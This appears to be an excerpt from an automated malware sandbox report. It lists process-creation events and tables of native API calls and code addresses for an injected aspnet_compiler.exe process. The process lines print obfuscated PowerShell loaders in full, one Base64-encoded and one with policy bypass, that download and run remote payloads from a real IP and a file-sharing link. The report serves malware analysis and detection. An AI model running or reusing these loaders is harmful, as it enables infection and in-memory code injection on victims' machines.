Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0042C4A3 NtClose,	16_2_0042C4A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F35C0 NtCreateMutant,LdrInitializeThunk,	16_2_015F35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2B60 NtClose,LdrInitializeThunk,	16_2_015F2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2DF0 NtQuerySystemInformation,LdrInitializeThunk,	16_2_015F2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2C70 NtFreeVirtualMemory,LdrInitializeThunk,	16_2_015F2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F3010 NtOpenDirectoryObject,	16_2_015F3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F3090 NtSetValueKey,	16_2_015F3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F4340 NtSetContextThread,	16_2_015F4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F4650 NtSuspendThread,	16_2_015F4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F39B0 NtGetContextThread,	16_2_015F39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2BF0 NtAllocateVirtualMemory,	16_2_015F2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2BE0 NtQueryValueKey,	16_2_015F2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2B80 NtQueryInformationFile,	16_2_015F2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2BA0 NtEnumerateValueKey,	16_2_015F2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2AD0 NtReadFile,	16_2_015F2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2AF0 NtWriteFile,	16_2_015F2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2AB0 NtWaitForSingleObject,	16_2_015F2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F3D70 NtOpenThread,	16_2_015F3D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2D10 NtMapViewOfSection,	16_2_015F2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F3D10 NtOpenProcessToken,	16_2_015F3D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2D00 NtSetInformationFile,	16_2_015F2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2D30 NtUnmapViewOfSection,	16_2_015F2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2DD0 NtDelayExecution,	16_2_015F2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2DB0 NtEnumerateKey,	16_2_015F2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2C60 NtCreateKey,	16_2_015F2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2C00 NtQueryInformationProcess,	16_2_015F2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2CC0 NtQueryVirtualMemory,	16_2_015F2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2CF0 NtOpenProcess,	16_2_015F2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2CA0 NtQueryInformationToken,	16_2_015F2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2F60 NtCreateProcessEx,	16_2_015F2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2F30 NtCreateSection,	16_2_015F2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2FE0 NtCreateFile,	16_2_015F2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2F90 NtProtectVirtualMemory,	16_2_015F2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2FB0 NtResumeThread,	16_2_015F2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2FA0 NtQuerySection,	16_2_015F2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2E30 NtWriteVirtualMemory,	16_2_015F2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2EE0 NtQueueApcThread,	16_2_015F2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2E80 NtReadVirtualMemory,	16_2_015F2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F2EA0 NtAdjustPrivilegesToken,	16_2_015F2EA0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04DD87D0	13_2_04DD87D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04DD7FF4	13_2_04DD7FF4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00401978	16_2_00401978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00403060	16_2_00403060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_004011F0	16_2_004011F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0042EAF3	16_2_0042EAF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0040239E	16_2_0040239E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_004023A0	16_2_004023A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0040FC6A	16_2_0040FC6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0040FC73	16_2_0040FC73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00402C11	16_2_00402C11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00416623	16_2_00416623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00416622	16_2_00416622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0040FE93	16_2_0040FE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0040DF13	16_2_0040DF13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_004027C0	16_2_004027C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_004027BC	16_2_004027BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0168B16B	16_2_0168B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AF172	16_2_015AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F516C	16_2_015F516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01648158	16_2_01648158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B0100	16_2_015B0100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0165A118	16_2_0165A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016781CC	16_2_016781CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016801AA	16_2_016801AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015CB1B0	16_2_015CB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0167F0E0	16_2_0167F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016770E9	16_2_016770E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C70C0	16_2_015C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0166F0CC	16_2_0166F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AD34C	16_2_015AD34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0167A352	16_2_0167A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0167132D	16_2_0167132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016803E6	16_2_016803E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015CE3F0	16_2_015CE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0160739A	16_2_0160739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01660274	16_2_01660274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016612ED	16_2_016612ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015DB2C0	16_2_015DB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C52A0	16_2_015C52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01677571	16_2_01677571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C0535	16_2_015C0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0165D5B0	16_2_0165D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01680591	16_2_01680591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01672446	16_2_01672446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B1460	16_2_015B1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0167F43F	16_2_0167F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0166E4F6	16_2_0166E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015E4750	16_2_015E4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C0770	16_2_015C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015BC7C0	16_2_015BC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B17EC	16_2_015B17EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0167F7B0	16_2_0167F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016716CC	16_2_016716CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015DC6E0	16_2_015DC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C9950	16_2_015C9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015DB950	16_2_015DB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D6962	16_2_015D6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0168A9A6	16_2_0168A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C29A0	16_2_015C29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015CA840	16_2_015CA840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0162D800	16_2_0162D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015EE8F0	16_2_015EE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C38E0	16_2_015C38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015A68B8	16_2_015A68B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0167FB76	16_2_0167FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01635BF0	16_2_01635BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015FDBF9	16_2_015FDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01676BD7	16_2_01676BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015DFB80	16_2_015DFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01633A6C	16_2_01633A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01677A46	16_2_01677A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0167FA49	16_2_0167FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0166DAC6	16_2_0166DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01605AA0	16_2_01605AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0165DAAC	16_2_0165DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015BEA80	16_2_015BEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01677D73	16_2_01677D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C3D40	16_2_015C3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01671D5A	16_2_01671D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015CAD00	16_2_015CAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015DFDC0	16_2_015DFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015BADE0	16_2_015BADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D8DBF	16_2_015D8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01639C32	16_2_01639C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C0C00	16_2_015C0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B0CF2	16_2_015B0CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01660CB5	16_2_01660CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01634F40	16_2_01634F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01602F28	16_2_01602F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0167FF09	16_2_0167FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015E0F30	16_2_015E0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B2FC8	16_2_015B2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015CCFE0	16_2_015CCFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C1F92	16_2_015C1F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0167FFB1	16_2_0167FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C0E59	16_2_015C0E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0167EE26	16_2_0167EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0167EEDB	16_2_0167EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D2E90	16_2_015D2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C9EB0	16_2_015C9EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0167CE93	16_2_0167CE93

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 0163F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 01607E54 appears 94 times
